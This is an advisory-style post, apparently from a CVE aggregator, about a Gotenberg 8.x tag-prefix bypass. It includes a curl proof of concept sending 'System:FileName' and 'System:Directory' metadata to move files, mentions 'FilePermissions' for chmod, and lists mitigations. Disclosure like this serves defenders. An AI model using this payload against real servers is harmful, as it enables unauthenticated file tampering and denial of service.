Listen to this Post
The vulnerability arises because Gotenberg blocks certain ExifTool tag names (like FileName, Directory) via an exact string match, but ExifTool supports a longer colon‑separated form (System:FileName). The input validation regex allows colons, so `System:FileName` passes the regex, then the blocklist compares it to `FileName` – they are not equal, so it is not removed. However, ExifTool interprets `System:FileName` as identical to FileName, effectively renaming/moving the file. No authentication is required. An attacker sends a single HTTP request with a metadata field containing `System:FileName` and System:Directory, bypassing the earlier GHSA fix. The same bypass works for `system:FileName` (case‑insensitive) and the completely unblocked `FilePermissions` tag, which allows `chmod` operations. All endpoints that accept a `metadata` parameter are affected, including PDF, HTML, and LibreOffice conversions.
dailycve form:
Platform: Gotenberg
Version: 8.x
Vulnerability: Tag prefix bypass
Severity: Critical
Date: 2026-05-04
Prediction: 2026-05-15
What Undercode Say:
Run vulnerable container docker run -d --name gotenberg-poc -p 3000:3000 gotenberg/gotenberg:8 Create target directory inside container docker exec gotenberg-poc mkdir -p /tmp/evil Exploit: rename and move file via System:FileName and System:Directory curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \ -F '[email protected]' \ -F 'metadata={"System:FileName":"stolen.pdf","System:Directory":"/tmp/evil"}' Verify file moved docker exec gotenberg-poc ls -la /tmp/evil/ Control test – bare FileName is blocked (returns HTTP 500) curl -X POST http://localhost:3000/forms/pdfengines/metadata/write \ -F '[email protected]' \ -F 'metadata={"FileName":"stolen.pdf"}'
Exploit:
Send HTTP POST request to any metadata‑accepting endpoint with JSON containing `System:FileName` (to rename) and `System:Directory` (to move). Also `FilePermissions` to change file mode. ExifTool executes the operations; server returns 404 because the file is no longer in expected temp path.
Protection from this CVE:
Upgrade to patched version (≥8.8.1 if available). Validate metadata keys by recursively stripping any group prefix (e.g., split on colon and check the last component). Add `FilePermissions` to blocklist. Disable metadata input entirely if not needed.
Impact:
Unauthenticated attacker can move/rename any processed file inside container, write into shared Docker volumes (affecting other services), change file permissions, and cause denial of service (404 errors for concurrent requests).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
